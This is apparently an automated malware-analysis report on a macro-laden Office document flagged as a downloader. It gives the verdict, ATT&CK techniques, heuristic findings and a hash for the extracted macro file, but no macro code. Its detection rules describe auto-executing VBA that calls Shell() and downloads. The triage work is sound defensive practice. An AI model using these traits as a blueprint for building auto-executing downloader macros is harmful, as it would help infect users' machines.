Verdict: MALICIOUS
Risk Score: 242
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
Malware Insights
The sample is a malicious Office document containing a VBA macro. The macro is configured to auto-execute and uses the Shell() function, indicating an intent to run an external command or payload. The ClamAV detection name 'Doc.Downloader.Valyria-6667774-0' further supports its role as a downloader.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6667774-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6667774-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10315 bytes |

SHA-256 of macros.bas: 747a25c3e991e6eba140b9d99005ce7e21d4c0dc9142a5d23495cc977692fbf4

Preview script: first 1,000 lines of the extracted script